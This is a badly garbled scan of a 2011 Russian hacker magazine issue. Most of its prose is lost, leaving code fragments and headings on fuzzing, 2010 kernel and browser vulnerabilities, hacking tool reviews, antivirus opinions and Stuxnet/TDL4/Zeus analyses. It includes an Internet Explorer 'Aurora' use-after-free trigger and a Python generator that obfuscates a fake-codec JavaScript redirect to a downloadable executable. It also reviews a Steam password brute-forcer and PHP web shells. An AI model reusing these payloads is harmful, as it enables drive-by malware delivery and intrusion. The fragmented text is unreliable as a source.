+----+--------+
| "%n%n"
|
+----+--------+
+----++
|0000||
+----++
| "" |
+----++
, , , ,
... ,
-
(0xFFFF -1)
memcpy, , .
char buffer[32000];
short int length=getLen(filename, offset); //
length=-1 ~ 0xFFFF
if(length<32000) {
// -1<32000
char* p = getPointer(filename,offset+4);
memcpy(buffer,p,length); // length==65535
}
else
ExceptionBoF(length);
( ),
. :
+----+--------+
|0004|61626364|
+----+--------+
| "abcd"
|
+----+--------+
:
+----+--------+
|0000|61626364|
+----+--------+
| "abcd"
|
+----+--------+
+----+--------+
|00FF|61626364|
X 01 (144) 2011
In Memory Fuzzing. stack overflow
+----+--------+
| "abcd"
|
+----+--------+
+----+--------+
|FF00|61626364|
+----+--------+
| "abcd"
|
+----+--------+

(0xFF00 - -256 65280 ),
- .
I'll crash you!
,
. , (
), .
, , , - . ,
,
,
. , , . , ,
- ( / ) ,
. ,
, .
, .
More profit...
, , .
, ,
, . , 2006 (Shawn Embleton),
(Sherri Sparks) (Ryan Cunningham)
. ,
( ,
..) , .
( ), ,
, , API (strcpy)
, , .
,
.
( ). , ,
, :).
065
fputs("FUNC1: done!\n",stdout);
}
avalanche, klee
hotfuzz, inmemoryfuzzing
sulley, peach
simple fuzzer:

blackhat.com/
presentations/bh-usa-06/BH-US-06-Embleton.pdf.
In-Memory Fuzzing
, .

?
. , ,
, ,
.

. ,
; , ,
, (, ,
..).
, accept,
recv, .
CorelanSecurity Team,
redmine.corelan.be:8800/projects/inmemoryfuzzing/files.
, Pydasm (therning.org/magnus/
archives/278) Paimei (openrce.org/downloads/details/208/PaiMei).
, Immunity Debuger
(debugger.immunityinc.com/register.html). ,
,
) c pvefindaddr.py (redmine.corelan.be:8800/projects/
pvefindaddr). , ,
:
1. ;
2. pvefindaddr, PyCommand (
);
3. pydasm 2.5;
4. , , installers, ;
5. pydasm Python25\Lib\
site-packages\pydbg\pydasm.pyd.
PyDbg 2.5. - . , ,
,
. ,
- .
, .
.
void func1(char* input)
{
char buffer[255];
unsigned int len=strlen(input);
if(len<255) strcpy (buffer , input);
066

{
char buffer[255];
strcpy(buffer,input);
}
{
char buffer[255];
strncpy(buffer,input,254);
}
, , ,
,
. - .
input.txt: function_1:func
tion_1:function_3. (vuln.exe)
, .
.
. pvefindadr.
, functions -o -m vuln.
exe. functions.txt.
. Trace.py.
, Trace.py, ,
, .
vuln.exe . func.
.
functions.txt, function_. , (RET),
(, ,
ESP+4, , ESP+8).
new_functions_addrs.txt ( ) flow_log.txt ( ).
CTRL+C ,
:). flow_log.txt ,
( ESP+4 ), /
new_functions_addrs.txt breakpoints.txt,
.
:
0x00401000 0x0040106d ESP+4
0x00401070 0x004010c7 ESP+4
0x004010d0 0x00401125 ESP+4
InMmoryFuzzer.py
vuln.exe. ,
, ,
,
( )
(). crashbin
. ,
(. ). ,
(InMemoryFuzz) ,
, ,
... , , pvefindaddr ,
IDA. ,
,
X 01 (144) 2011
Peach
(00401070) .
, strcpy ,
. ,
. ( ,
, ,
). ,
(vuln.exe
/GS), security cookie
,
, .
Recorded
data
agregation
Data
matching
Proxy

. , , ,
winappdbg.
.
, winappdbg
.
: avalanche klee
avalanche (http://code.google.com/p/avalanche/):
.
X 01 (144) 2011
Custom
Process
monitor
Peach in
the middle
Custom
publisher
GUI
Communicator
Main
window
Fuzzing
Graphical
User
Interface
Hot fuzz
Datatypebased
fuzzing
Netstat
based
port
scanning
Dialogs
UDP
support
Custom
Random
Fuzzing
strategy
Packet
reconstruction
Viewing
crash
details
Data
receive
Packets
dissection
Filling in
missing
data
Aditional
data
analysis
Process
handling
XML
manipulators
Storing
application
settings
Transforming C-structures
into Python-structures
Data analysis
Sulley peach.

. , FTP 329
, . ,
.
hotfuzz (hotfuzz.atteq.com).
,
. Hotfuzz peach .
.
, ,
, , ,
tm_export, tshark (
wireshark). , ,
, .
, , ... !
,
peach ( DVD).
Customized
WindowsDebugEngine
Monitor
Recording
TCP
support
:
3*10^6 5*10^3 ,
1-3 ;
1*10^6 15*10^3 , 6-10 ;
:
1*10^5 150 ,
0-3 ;
1*10^4 150 ,
0-1 .
,
:
http://sites.google.com/
site/felipeandresmanzano. ,

.
,
. .
Configuration
file
generation
Data type
correction
Transformation
into Peach
structures
Peach structures
creation
Strings
tokenization
Finding
relations
Wireshark libraries
hotfuzz
Avalanche
( ). , .
, . Avalanche
,
stp valgrind (
). :
$ wget http://avalanche.googlecode.com/files/
avalanche-0.2.tar.gz
$ tar -xvf avalanche-0.2.tar.gz
$ cd avalanche-0.2
$ configure --prefix=`pwd`/inst
$ make
$ make install
:
$ ./inst/bin/avalanche --filename=samples/simple/seed
--debug samples/simple/sample2 samples/simple/seed
Avalanche,
avalanche ? -
067
Certification of programs for secure information

flow Dorothy E. Denning and Peter J. Denning. 1977
Communication of the ACM.
A lattice model for secure information flow Dorothy E.
Denning 1976 Communication of the ACM.
Dytan: A generic dynamic taint analysis framework
James Clause, Wanchun Li, and Alessandro Orso. Georgia
Institute of Technology.
Understanding data lifetime via whole system emulation
Jim Chow, Tal Garfinkel, Kevi Christopher, Mendel Rosenblum
USENIX Stanford University.
LIFT: A Low-Overhead Practical Information Flow Tracking
System for Detecting Security Attacks Feng Qinz Ho-seop
Kim, Yuanyuan zhou, Youfeng Wu - University of Illinois at
Urbana-Champaign.
winappdbg.sourceforge.net/Tools.html.
www.fuzzing.org.
winappdbg
avalanche ,
.
, ,
,
. :
(tainted) ,
( , , ..),
.
( , ,

). ,
,
, ,
, . Avalanche

Valgrind
(solver/) STP. Avalanche
: () Valgrind
Tracegrind Covgrind,
STP . Tracegrind

. STP . - , STP
( ), .
,
.

. ,
STP
.
068
,
, .
(
, Valgrind).
Covgrind,
. Covgrind , Tracegrind,

.
: Avalanche ,
,
. (tainted
analysis[2-5]), , , ,
.
STP
STP bitvector ( ) . , , (loop). ,

,

(loop) (control flow graph). :
groups.csail.mit.edu/pag/daikon;
http://research.microsoft.com/
en-us/um/people/sumitg/pubs/vmcai09_cons.pdf;
groups.csail.mit.edu/pag/pubs/annotation-studyfse2002-abstract.html.
Avalanche ,
. KLEE
(klee.llvm.org).
. z
X 01 (144) 2011

PocketBook!
PocketBook

?
?
usability? ,
10 2011 pocketbook@real.xakep.ru.
E-Ink
: PocketBook 902.
X 01 (144) 2011
023

, CISS Research Team http://twitter.com/NTarakanov
TOP5
2010
- ,
!
-,
.
5 .
32- 64- linux

2007 CVE-2007-4573 (bit.ly/CVE-20074573). cliph,
Wojciech Purczynski (, ?).
, 64-
linux, 32- . (
arch/x86_64/ia32/ia32entry.S), 32-
64-:
sysenter_do_call:
cmpl
$(IA32_NR_syscalls-1),%eax
<---- EAX
ja
ia32_badsys
IA32_ARG_FIXUP 1
call
*ia32_sys_call_table(,%rax,8)
<---- RAX
, eax .
, IA32_ARG_
FIXUP. 64- 32-.
sysenter_do_call, ,
eax,
rax! , 32 ,
070
call !
.macro IA32_ARG_FIXUP noebp=0
movl
%edi,%r8d
.if \noebp
.else
movl
%ebp,%r9d
.endif
xchg
%ecx,%esi
movl
%ebx,%edi
movl
%edx,%edx
/* zero extension */
.endm

LOAD_ARGS:
X+
.macro LOAD_ARGS32 offset
+
movl \offset(%rsp),%r11d
+
movl \offset+8(%rsp),%r10d
+
+
+
movl \offset+40(%rsp),%ecx
+
movl \offset+48(%rsp),%edx
+
movl \offset+56(%rsp),%esi
+
movl \offset+64(%rsp),%edi
+
movl \offset+72(%rsp),%eax <----
rax
X 01 (144) 2011
.endm
24 2008
, :).
-
movl \offset+72(%rsp),%eax
.endm
2010 Ben Hawkes, ,

eax.
Ac1dB1tch3z. Ben
Hawkes' ;).
FreeBSD 7.2
cmpl
$(IA32_NR_syscalls-1),%eax
+
cmpq
$(IA32_NR_syscalls-1),%rax <--- rax eax
4 .
FreeBSD: nfs_mount()
Patroklos
Argyroudis, argp.
nfs_mount,
mount() nmount(),
, . sys/nfsclient/nfs_vfsops.c 8.0:
* 1094
if (!has_fh_opt) {
* 1095
error = copyin((caddr_t)args.fh,
(caddr_t)nfh,
<-----
*
*
*
*
1096
1097
1098
1099
args.fhsize); <----- fhsize

if (error) {
goto out;
}

: vfs.usermount
( ). , :
+
if (args.fhsize < 0 || args.fhsize > NFSX_
V3FHMAX) {
+
vfs_mount_error(mp, "Bad file handle");
+
error = EINVAL;
+
goto out;
+
}
FreeBSD 8.0 ,
, canary word. FreeBSD
stack-smashing protection.
. ret , canary word
X 01 (144) 2011
FreeBSD
. , (ring 3), (ring 0). -
7- , 8- DoS' :(.
3 .
Windows
! ,
mail.ru
Windows 17- !.
32- Windows, NT 4.0 !
Windows 16-
NTVDM (NT Virtual DOS Mode).
Tavis Ormandy
Google. , /.
:
1. VDM SeTcbPrivilege.
2. (Ring 3 )

.
3. -
071
Tavis'
trap frame. Tavis Ormandy !
. . NTVMD-,
csrss API-
,
.
. CPL (Current Privilege Level)
cs
ss, ,
Virtual-8086.
x86 , ,
16 , 20- .
: (cs << 4) + (eip & 0xffff).
Virtual-8086.
, cs !
. iret
.
Intel 6 ,
IF-. : Pre-commit
Post-commit. , ring 3.
VDM,
NtVdmControl, pre-commit trap-frame.
2 . Internet
Explorer: Aurora
IE (CVE-20100249),
Aurora.
Microsoft',
( MS).
CVE-2010-0249 mshtml.dll. ,

use-after-free. , JavaScript,
:
document.CreateEventObject() ;
document.getElementById(),
, JavaScript'a -
072

-
, !
-
srcElement CEventObj::GenericGetElement
mshtml.dll, , , CElement::
GetDocPtr.
:
function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}
function ev2()
{
var data, tmp;
data = "";
tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++)
{
obj[i].data = data;
}
event_obj.srcElement;
}
X 01 (144) 2011
CPL_FindCPLInfo
CPL_LoadAndFindApplet
DSA_GetItemPtr
CPL_LoadCPLModule
CopyIcon
_LoadCPLModule
_InitializeCPLModule
hIcon
LoadLibraryW
hModule
_InitializeControl
Data Access
Control Flow
DSA_InsertItem
LoadImage
Control flow: LoadLibraryW
, DEP,
ASLR,
, .
Google: , 12
Gmail.
! :) ,
, , , Google .
17 . Microsoft
advisory.
( ;)),
Microsoft VirusBlokAda
, .
-, - :).
stack/heap overflow
.. ,
:).
Control Panel,
Explorer.exe.
shell32.dll,
,
( ) LoadLibraryW.
,
(DEP/ASLR/SEHOP) !
1 .
lnk-
2011-?
<body>
<span id="sp1">
<img src="aurora.gif onload="ev1(event)">
<-----
</span>
</body>
, , , , top 5! Stuxnet,
USB-.
MetaSploit'e , WebDAV .
:
17 .
VirusBlokAda ,
Windows 7,
USB-
(Windows Explorer).
X 01 (144) 2011
,
2010 , .
Stuxnet
SCADA-, Aurora
, -
:). , (,
, ) 0day .
, ,
Windows Vista, 2008, 7,
Stuxnet! . , , . z
073

icq 884888, http://snipper.ru
X-TOOLS
: SteamÒ Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: INSIDER

, steam-.
:
(http, socks 4/5);
;
;
good;
error
( , ).

:
1.
txt- (
login;pass , proxy:port);
2. ;
3. START.
,
, ,
.
: Mikstura
: *nix/win
: Dr.TRO
php-.
:

;
074
, data:, php://
input;

data: php://input,

;
-
;
, , full path,
( 15
"../");

( );
HTTP- perl-
LWP::Protocol::socks.

.

http://forum.
inattack.ru/Mikstura-Mini-utilita-Dlja-RabotyS-Inkludami-t23830.html.
: ITSecTeam Shell v2.1

: *nix/win
: Amin Shokohi(Pejvak)
php-.
:). ,
- ITSecTeam Shell v2.1!
:
(66 );
;
;
;
MySQL, MSSQL,
PostgreSQL, Oracle & IBM DB2;
;
, PHP safe mode;
Windows;

;

;
zip ;
;
( php);

;
-;
DoS;
sql/gzip-;
-
;
;

DDoS-;
;
symlink mod_security .htaccess;
;

php;
;
magic_quotes;
.
,
, :).
http://itsecteam.
com/en/tools/itsecteam_shell.htm.
: ICQuinValuer
: Dank & DeMerk &
NightEagle

.
X 01 (144) 2011
ICQ-

ICQ-
.
ICQ :
(viz/
inviz) ;
( ,
, , , , , ..);
;
;
;

;

;
.
,
:).

forum.asechka.ru/showthread.php?t=118542.
: Easteregger
:
,
. . Eastegger
:).

( ),

.
,
, , , ,
.
.
:
1. (, , );
2. , , , .
,
Torrent. :
X 01 (144) 2011

.
Help-About Torrent
( Torrent).
torrent .
T
(Tris).

P, .
WSO-
, Eastegger',

:).

http://eastegger.com.
: PWGen
: Christian Thoeing

.

PWGen,
. :
Free Open-Source;

AES SHA-2;
(
DLL',
Windows);

(
, ,
);
;
;
;
.
,

http://pwgen-win.
sourceforge.net. *nix , http://pwgen.sourceforge.
net.
: WSO Krist_ALL edition

: *nix/win
: Krist_ALL
WSO. Krist_ALL

, :
(
downloader', , , ,
);

( writable,
);
,
(
INFO);
;
( );

;

INFO;
;
php,
php;
milw0rm;
;
$t
(1 ,
2 );

.

http://exploit.in/forum/index.
php?showtopic=40939.z
075
MALWARE
lozovsky@gameland.ru
/INTERNET SECURITY
() Malware
. , ,
.
, , ,
:).
, , .
,
, :
anti-malware.ru, ,
- Deeoni$ ,
,
X
1. ,

USB- .
Microsoft Security
Essentials:
, ,
,
.

:

,
,
64- .
2.
: KIS, Dr. Web, Nod32, Symantec.
.

Avast.
3. ,
cloud- Symantec:

,

.
,
Symantec
.
:).
, , :
1. , . ?
2. , .
, .
3. , -
. ?
Security.
. Idle Mode
,
.
: -?. ,
:). , .
Symantec ,
.
,
.
.
exe - , ,
? .. , ,

:
, -
, .
.
, , .
.
, ,
.
1. .
STEP ,
PC_ZONE DVD
: Norton Internet
076
,
.
(
) ,
- :). IM-,
.
Dr.Web, -
, .
2. Dr.Web . . Spyder, .
,
.
3. :). , 10 KIS.
, ,
.
KIS ,
.
,
X
1. Microsoft
Security Essentials, ,
- .
.
,
,
. -
, , .
2. -: , , AVG,
Essentials. , -
, ,
, .
3. -,
.
X 01 (144) 2011
,
MALWARE
,
UNIXOID
1. : KIS2011 Dr.Web
1.
, vast!. KIS
( , ,
:)), Dr.Web , 90-
OneHalf.
, , .
, : -,

-

- .
2. Avast! . ,
.
,
,
,

: , ,

.
.
3. Comodo. -,
Internet Security
, .
:), .
,
, ,
, ,
.
Eset Nod32.
, Dr.Web
Cureit!
.
. , :
- (
Win2k3r2) Kerio WinRoute Firewall
McAfee
;
(OpenBSD) Spamd
( greylisting) + Sendmail (
) + Clamav + Procmail ( ,
Maildir);
(WinXP) Eset Nod32
+ Dr.Web Cureit! + Kaspersky Virus Removal
Tool + MalwareBytes Anti-malware + AVZ (
) + Dr.Web LiveCD (

) + Acronis True Image BootCD (
/ ).
2.
Nod32,
.
.
3.
.
, ,
,
ANTI-MALWARE.RU
1.
Windows 7 x64,

,
.

Microsoft
Security Essentials, Avast 5 Free Anti-virus. ,

-
,
.
2. . : X 01 (144) 2011
,
,
.
, ,
, Microsoft, Avast Avira.

,
,

Windows XP,
, Kaspersky
Internet Security, Norton Internet
Security BitDefender Internet
Security.
3. ,

. ,
: , :
-
squid (
), havp clamav. : clamav ,
havp . Linux
.
.
DEEONI$,
- X
1. Avast Free Antivirus.

, ,
.
. , .
2. , . -,
. -,
, ,
. -, :
,
..
Ok.
3. Avira
AntiVir. , ,
. BitDefender, -
- (
) .
, , -
,

.

, Symantec
(Norton), Microsoft, Avast Panda.
,
,
,
.

Internet Security Total
Security -
( -).
, (
)
: ,
, , ,

.

,
, ,
.

Norton 360 -,

,

. z
077
MALWARE
presidentua http://tutamc.com
-

!

!
JS-
Python
.
,
. ?
!

-
.
80
.
JavaScript XOR. .
JavaScript
.
Internet Explorer,
. ,
,
,
.
JavaScript (, ).
:).
078
, ,
. ,
,
, .
JavaScript .

,
. - ( ,
, , ),
.
,
. ,

.
X 01 (144) 2011
"You don't have codec

for video".
, .
, +
String.fromCharCode ():
vary a = "co" + "de" + String.fromCharCode(69)
+ "c";
(
) .
JavaScript, go_codec. ,
. , ,

. , ,
, go_codec - SDdsdsW,
go_codec SDdsdsW.
:
Trial-Reset
JavaScripta,
:
<script>
function go_codec()
{
location.href = "http://server/codec.exe";
}
var message = "You don't have codec for video";
alert(message);
setTimeout( go_codec(), 1000);
</script>
.

hex-. Python , :
import random
from string import letters
def morf_html_string(html):
rez = ''
for s in html:
if s in letters and random.choice([True,
False, False, False]):
rez += "&#%s;" % ord(s)
else:
rez += s
return rez
, (in
letters), 25% hex-. , a a.
You don't have codec for video - :
X 01 (144) 2011
class G(object):
rand_var = {}
.

:
def rand_var(var):
if var in G.rand_var:
return G.rand_var[var]
G.rand_var[var] = generate_string(5, 10)
return G.rand_var[var]
;
, .
, 5
10 , .
, generate_
string! :
DVD
dvd

, JavaScript

.
,

.
WARNING
warning

.

Internet Explorer.

.

,

. :).
def generate_string(start=5, end=7):

r = ''
for _ in xrange(random.randrange(
start,end)):
r += random.choice(letters)
return r

, , , .
- .
:
var b="aaa";
if ("aaaa"=="sdsdsd") asdasdas();
function sfsf(){};
get_el_, - :
079
MALWARE
def get_el_1():
return "var %s='%s';" % (
generate_string(4,6),
generate_string(4,6)
)
(get_
el_1, get_el_2 get_el_3) :
def random_js_element():
def get_el_1():
return "var %s='%s';" % (
generate_string(),
generate_string()
)
def get_el_2():
return "if ('%s'=='%s') %s();" % (
generate_string(),
generate_string(),
generate_string()
);
def get_el_3():
return "function %s(){}" % (
generate_string())

from tornado.template import Template
template_js = "our_example_template"
js = Template(template_js).generate(
rand_var=rand_var,
morf_html_string=morf_html_string,
random_js_element=random_js_element
)
fnc = "get_el_%s"%random.randrange(1,4)
return locals()[fnc]()
, .
,

locals().
, , :
>>> random_js_element()
'function aErfSA(){}'
"if ('uHsJi'=='YvEwVNttta') pxQdHssd();"
"var yrSfsdgS='OywZCvq';"
,
.
, . . Template- - TornadoWeb.

JavaScript. ,
.
,
, JavaScript
:
{{ }}
var a = "{{ (" ") }}"
, , .
( template_js) JavaScript, ( Template) .

JS .
Tornado-
. :
<script>
{{ random_js_element() }}
function {{ rand_var("go_codec") }}(){
location.href = "{{ morf_html_string("http://
Pythona
random randrange
choice. ,
start stop:
random.randrange(start, stop)
.
,
- . , 33%:
if random.choice([True, False, False]):
print "33.33333%"
string
:
from string import letters
>>> letters
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu
vwxyz'
letters ( ),
ascii_letters .
, .
080
X 01 (144) 2011
server/codec.exe") }}";
}
var {{ rand_var("message") }} = "{{
morf_html_string("You don't have codec for
video") }}";
alert({{ rand_var("message") }});
setTimeout( {{ rand_var("go_codec") }}(),
1000);
HTTP://WWW
</script>
,
( ). , rand_var - {{
rand_var("go_codec") }}.
{{ morf_html_string("http://server/codec.
exe") }}.

, .

, ,
:
location.href = "http://codec/codec.exe";
:
var a = location;
a.href = "http://codec/codec.exe";
a["h"+"ref"] = "http://codec/codec.exe";
, :
var {{ rand_var("location") }} = location;
{{ rand_var("location") }}["{{ morf_html_
string("href") }} "] = "{{ morf_html_
string("http://codec/codec.exe") }}";
, 2
-
:)

JavaScript-:
def many_random_js(start=0, stop=5):
rez = ""
for _ in xrange(random.randrange(
start, stop)):
rez += random_js_element()
return rez

{{ many_random_js() }}.
. :
, ,
. ,
, JavaScript- . , ,
.
, ,
? .
,

. .
PS: , , !
(-, ,
, , . ) :). z
links

,
:
http://developer.
yahoo.com/yui/compressor/
http://code.google.
com/closure/compiler/
http://jscrambler.
com/
http://javascriptobfuscator.com/
http://www.stunnix.
com/prod/jo/
http://www.crockford.com/javascript/
jsmin.html
http://www.daftlogic.com/projectsonline-javascriptobfuscator.htm

TornadoWeb,

http://www.tornadoweb.org/
IDE Python PyCharm .

Python. ,
collections defaultdict, rand_var.
defaultdict
.
:
>>> a = defaultdict(generate_string)
>>> a["go_codec"]
dqQSfw
>>> a["location"]
EdstEf
>>> a["go_codec"]
dqQSfw
X 01 (144) 2011
081
MALWARE
, ESET, www.twitter.com/matrosov
TO-5
2010

,
.
,
,
. 2010 ,
.
82
082
X 01 (144) 2011
>> coding
Stuxnet

. , Stuxnet
,
.

. , .

Stuxnet ( )
. HIPS-,
. , , , Realtek JMicron.

Microsoft,
, . ? MS! , MS ,
. ,
, , .
.
, Stuxnet .
- ,
, , , .
0-day

,
. MS10-046,
, LNK/PIF-.
,
.
,
,
.
:
X 01 (144) 2011
tdl
config.ini
File table
TDL3
MS10-061 Print Spooler,

.
.
MS08-067 , ,
Conficker.
. ,
, , Conficker
.
, Stuxnet
. ,
,
.

. : Win2000/XP
Vista/Win7.
MS10-073 win32k.sys, Win2000/XP .
,
83
083
MALWARE
Lnk-, Stuxnet

TDL4 MBR
. ,
Stuxnet . .
( Vendor-ID) (Task
Scheduler), SYSTEM Vista/Win7/Win2008.
.
, ,

. ,
Smartcard API !
,
( PoC) Microsoft. , ,
:).

CVE-2010-2772, Siemens Simatic
WinCC PCS 7 SCADA, -
MS Internet Explorer ( Zeus)
, TDL4
84
084
X 01 (144) 2011
>> coding

STUXNET
Win2000/XP
removable devices
MS10-046
MS10-073
general attack vector
privilege escalation
propagation
Stuxnet propagation
and installation vectors
in MS Windows
additionall attack vector
installation
privilege escalation
local network
Vista/Win7/Server 2008
MS08-067
MS10-0XX
MS10-061
Microsoft SQL WinCC.

TDL3
SeLoadDriver

PrintProcessor

IMAGE_FILE_DLL
PE-
ShellExecute
(AddPrintProcessor)
API
(DeletePrintProcessor)
API
( TDL3)
DRIVER_SECTION
pci.sys
DRIVER_SECTION
Driver1.sys

Stuxnet ,
:
- , Microsoft
Visual C++. , . ,
. -, : , .
,
,

.

P2P,
, , .
, Stuxnet,
. Stuxnet Under the Microscope
70 ,
:).
TDL4
, 64-,
. TDL4
TDL3,
. TDL4
64 Windows.
,
DRIVER_SECTION
Driver2.sys
DRIVER_SECTION
DriverN.sys
DRIVER_SECTION
Driver32k.sys
X 01 (144) 2011
85
085
MALWARE
-
MBR
. , Mebroot, StonedBoot . ,
, TDL3 , , 64-
, .
, :
(
\\??\PhysicalDrive0),
C:;

( TDL3 );
MBR-,
;
x64- WinAPI ExitWindowsEx()

ZwRaiseHardError().
:
BIOS
MBR.
TDL4;
, ldr16
;
ldr16 13h,
. (x32
x64), , , ldr32 ldr64;
, ldr32 ldr64,
TDL4, API, ;
, .

IoCreateDriver(). .

TDL4 ,
,
TDL3.
TDL3

,
, , ,
. , 3.273.
TDL3 2010 ,
( - MS :)) HIPS-.

TDL3.
Stuxnet
086
HIPS-
WinAPI- AddPrintProcessor
AddPrintProvidor,
HIPS-,
X 01 (144) 2011
>> coding
HIPS
Stuxnet
TDL4
TDL3
Dalixi
Zeus2
MBR

PRIVILEGE, / .
, WinAPI-
RtlAdjustPrivilge. ,
%PrintProcessor% AddPrintProcessor/
AddPrintProvidor, tdl. RPC
( ).
TDL3
. ,
.
Hex-Rays ,

. , , , ,
. , , , , ,
. TDL3 , .
BOOL AddPrintProcessor(
__in LPTSTR pName,
__in LPTSTR pEnvironment,
__in LPTSTR pPathName,
__in LPTSTR pPrintProcessorName
);
:
BOOL AddPrintProvidor(
__in LPTSTR pName,
__in DWORD Level,
__in LPBYTE pProviderInfo
);
TDL3 :
;
.
, , SE_LOAD_DRIVER_
X 01 (144) 2011

TDL3 .
,
,
.
TDL3
, .

.
,
TDL3 ( ,
).
,
.

TDL3
. , ,
, .

:
(tdlcmd.dll);
(config.ini);
(tdl);
(rsrc.dat);
.
, ( ) , TDL3 ,
.

tfd.
exe (TdlFsDumper, http://j.mp/tdl_dump). -
087
MALWARE

FS .
Dalixi

.
,
Dalixi HIPS
.

, callback-,
.
HIPS ( :
PsSetLoadImageNotifyRoutine, PsSetCreateProcessNotifyRoutine,
PsCreateThreadNotifyRoutine). ,
, . Dalixi
ZwSystemDebugControl, ntdll.dll.
NTSYSAPI
NTSTATUS
NTAPI
NtSystemDebugControl(
IN SYSDBG_COMMAND
IN PVOID
IN ULONG
OUT PVOID
IN ULONG
OUT PULONG
);
Command,
InputBuffer OPTIONAL,
InputBufferLength,
OutputBuffer OPTIONAL,
OutputBufferLength,
ReturnLength OPTIONAL
,
SysDbgCopyMemoryChunks_1
, , , .
NtSystemDebugControl
, Dalixi SysDbgCopyMemoryChunks_1 ,

.
InputBuffer , :
typedef struct _CPY_MEM_CHUNCKS_BUFFER
{
void *Destination;
// pointer to kernel-mode destination buffer
void *Source;
// pointer to user-mode source buffer
ULONG Size;
// size of the user-mode source buffer
} CPY_MEM_CHUNCKS_BUFFER, *PCPY_MEM_CHUNCKS_BUFFER;
, ,
Dalixi ,
. callback.
Zeus 2..
Zeus.
088
,

(
).
, Zeus,

VNC
Jabber.

X.509- , , ,
,
. CryptoAPI PFXImportCertStore
(
).
HCERTSTORE WINAPI PFXImportCertStore(
__in CRYPT_DATA_BLOB *pPFX,
__in LPCWSTR szPassword,
__in DWORD dwFlags
);
, , ,
Zeus ,
Stuxnet.

, zeus-.
, , ,
- .
, ,
.
Zeus ,
,
MS Internet Explorer
. , ,
,
.
, , .

Zeus
.
,
,
-
Smartcard API.
, Zeus,
SpyEye, , ,
, -
. C&C
, , .
.

. , . z
zobnin@gm ail.com
Linux BSD
,
:
, .
, . ,
, .
,

,
. ,

,
.
,
. , ,
, .
,
,
- (, Windows). ,
(,
X 01 (144) 2011
Linux), .

.

,
.
,
.

Linux,
Windows
-
.
UNetbootin
(unetbootin.sourceforge.net) USB- ,

.
, Ubuntu (www.
ubuntu.com/desktop/get-ubuntu/windowsinstaller) OpenSUSE (en.opensuse.org/
Instlux), UNetbootin
( Linux, BSD,
Linux). ,
, grub4dos ISO- -
089
UNIXOID
FreeBSD
Windows,
VirtualBox-3.2.10-66523-Win.exe.
,
- ,
.
, :
> cd c:\Program Files\Oracle\VirtualBox
> VBoxManage internalcommands createrawvmdk \
-filename c:\realhd.vmdk \
-rawdisk \\.\PhysicalDrive0 -register

Windows
. .
,
UNIX- , ,
UNIX (,
BSD Linux-). UNetbootin, ISO-
initrd- Grub (
BSD).
Windows Linux.

,
. , ,
Solaris
, . VirtualBox,
(www.virtualbox.org).
090
realhd.vmdk, C:, (\\.\PhysicalDrive0 Windows),

'-register' VirtualBox. , ,
Linux :
$ sudo VBoxManage internalcommands \
createrawvmdk -filename ~/realhd.vmdk \
-rawdisk /dev/sda -register
ISO- Linux- . , NTFS- Partition Magic WinXP/Win2k3

diskmgmt.msc Vista/Seven.
VirtualBox , .
, ,
CD-ROM . Linux .
, ,
(
,
VirtualBox). ,
(
X 01 (144) 2011
FreeBSD Linux.

Linux FreeBSD-,
Ubuntu,
UNetbootin, grub,
:
#
#
#
#
#
#
#
cd /usr/ports/sysutils/grub
sudo make install clean
mkdir /boot/grub
cp /usr/local/share/grub/i386-freebsd/* /boot/grub/
touch /boot/grub/menu.lst
sysctl kern.geom.debugflags=16
grub-install /dev/ad0
menu.lst:

# vi /boot/grub/menu.lst
title Ubuntu 10.10 AutoInstall
# X, Y, Z ,
, ISO-

map (hdX,Y,Z)/ubuntu-10.10-server-i386-auto.iso
(hd32)
map --hook
chainloader (hd32)
).
,
.
DHCP-, ,
SSH- ,
(, ).
,
SSH.
Windows Linux. UNetbootin
UNetbootin (Universal Netboot Installer) , USB-

UNIX- UNIX .
Windows, Linux,
( Linux BSD)
. ,
Ubuntu.
.
unetbootin.sf.net
Download (for Windows for Linux).
( Linux- ). UNetbootin,
, , (NetInstall
HdMedia ),
, ,
.
,
UNetbootin
Linux-,
.
,
X 01 (144) 2011
(
). ,
.
,
ISO- Ubuntu,
.
Ubuntu-10.10 ( ),
(
preseed-). :
1. Ubuntu 10.10
:
$ sudo mount -o loop \
ubuntu-10.10-server-i386.iso /cdrom
$ mkdir mycd
$ rsync -a /cdrom/ mycd
2. preseed- ( ):
$ vi auto.seed
# -
d-i debian-installer/locale string ru_RU
# ,
# ru,
d-i console-setup/ask_detect boolean false
d-i console-setup/layoutcode string us
#
d-i netcfg/choose_interface select auto
# FTP
d-i mirror/protocol string ftp
#
d-i partman-auto/init_automatically_partition select
biggest_free
#
d-i partman-auto/choose_recipe select atomic
# Ext4
d-i partman/default_filesystem string ext4
# ,
d-i partman-partitioning/confirm_write_new_label
boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
# user ( resu)
d-i passwd/user-fullname string Ubuntu User
091
UNIXOID
# IP-
d-i netcfg/get_ipaddress string 192.168.0.1
#
d-i netcfg/get_netmask string 255.255.255.0
#
d-i netcfg/get_gateway string 192.168.0.2
#
d-i netcfg/confirm_static boolean true
3. , preseed-:
$ sed -e 's#file=/cdrom/preseed/ubuntu.
seed#auto=true\ priority=critical\ file=/cdrom/
preseed/auto.seed#' mycd/isolinux/txt.cfg > txt.cfg
$ sudo mv txt.cfg mycd/isolinux/
UNetbootin
d-i passwd/username string user
d-i passwd/user-password-crypted password 458c9bfe3b6
716ad976383cf20a3dcf4
d-i user-setup/allow-password-weak boolean true
#
# kubuntu-desktop ubuntu-server,
tasksel tasksel/first multiselect ubuntu-desktop

# SSH-
d-i pkgsel/include string openssh-server
#

d-i grub-installer/with_other_os boolean true
# (Ubuntu, -)
xserver-xorg xserver-xorg/autodetect_monitor boolean
true
$ sudo cp auto.seed mycd/preseed
, us,

,
openssh-server user resu,
SSH.
( DHCP), d-i netcfg/choose_interface
select auto , :
# DNS-
d-i netcfg/get_nameservers string 8.8.8.8
Grub4dos Vista/Seven
1. C: grldr, grldr.mbr menu.lst;
2. Windows:
> bcdedit /create /d "Grub4Dos" /application
bootsector
3. (ID ):
> bcdedit /set ID device partition=C:
> bcdedit /set ID path \grldr.mbr
> bcdedit /displayorder ID /addlast
092
4. :
$ cd mycd
$ sudo rm md5sum.txt
